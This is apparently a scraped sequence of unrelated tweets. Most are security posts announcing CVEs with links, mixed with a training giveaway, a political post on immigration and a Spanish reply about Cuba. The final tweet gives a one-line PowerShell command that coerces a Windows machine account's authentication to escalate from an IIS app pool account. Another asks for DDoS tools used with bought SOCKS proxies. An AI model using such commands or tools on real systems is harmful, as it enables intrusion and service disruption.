@gothburz The funny thing is that the same employees who train the AI without knowing it ,are fired some time later when they realize that they can be replaced
BEN SAID I COULD DO A GIVEAWAY TOO 🥳
HackingHub Black Friday deal: https://t.co/Uf3mW11mcR
$39 for lifetime access ♾️
OR
$19 for a month trial ⏰
AND I can match his giveaway--
2️⃣ WINNERS (1 each)
- Full cert bundle
- Lifetime access
To enter: ↪️ retweet and reply w/ 🦃
Critical Roundcube XSS technical details: Desanitization, unsafe Content-Types, CSS exfiltration, and a Service Worker come together to persistently leak emails from a victim's browser.
Read about it here:
https://t.co/fOa2l0ujwV
(CVE-2024-42008, CVE-2024-42009, CVE-2024-42010)
@ancoder_frank39@UHN_Plus Es complicado hacer eso, en Cuba pasa algo similar y curiosamente Fidel tomó el poder con un golpe de estado. Pero créeme que no es fácil y menos en estos tiempos.
The potential impact on security and confidentiality of the file read vulnerability, CVE-2024-23897, in the Jenkins open-source automation server is what gives this vulnerability a critical 10.0 rating on the CVSS.
Here’s why this matters: https://t.co/7AkCx8tHjA
Because I am raising concerns about the flood of unvetted illegal immigrants overwhelming American cities, the press will often characterize me as “anti-immigrant”.
As an immigrant myself, nothing could be further from the truth.
I am very much in favor of increased and expedited legal immigration for anyone who is talented, hard-working and honest.
It is bizarrely difficult and agonizingly slow to immigrate to the USA legally, but trivial and fast to enter illegally! This obviously makes no sense.
CVE-2024-25600: Unauth. RCE vulnerability caused by PHP code injection in Bricks Builder, a WordPress site builder with over 25,000+ active installations.
Severity: Critical (CVSS 9.8)
Root cause analysis: https://t.co/E5K0sIZQn9
PoC: https://t.co/8DflZk7QIW
Mitigation: Upgrade
I have a friend who has been tasked with conducting DDoS testing (approved as part of a red teaming exercise).
I suggested https://t.co/zmmj8QDuNf because it's what malicious actors are using in conjunction with freshly purchased SOCKS proxies.
Do you know of any other tools that could be used in such a scenario?
My @BlackHatEvents keynote is finally up on YouTube!
Enjoy the AI-generated subtitles creatively interpreting my speech about the flaws of AI. 😂
I was really nervous at first, but it all went away once I realized how lovely the crowd was.
https://t.co/2mYB8nNSas
I discovered several RCE vulnerabilities within Inductive Automation Ignition, such as ZDI-CAN-21801, ZDI-CAN-21624, ZDI-CAN-21625, ZDI-CAN-21926.
You can access my blog post covering CVE-2023-50220 at this link :D
https://t.co/ZZjNU7m1Ml
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ?
Simply use:
powershell iwr http://192.168.56.1 -UseDefaultCredentials
To get an HTTP coerce of the machine account.
👇🧵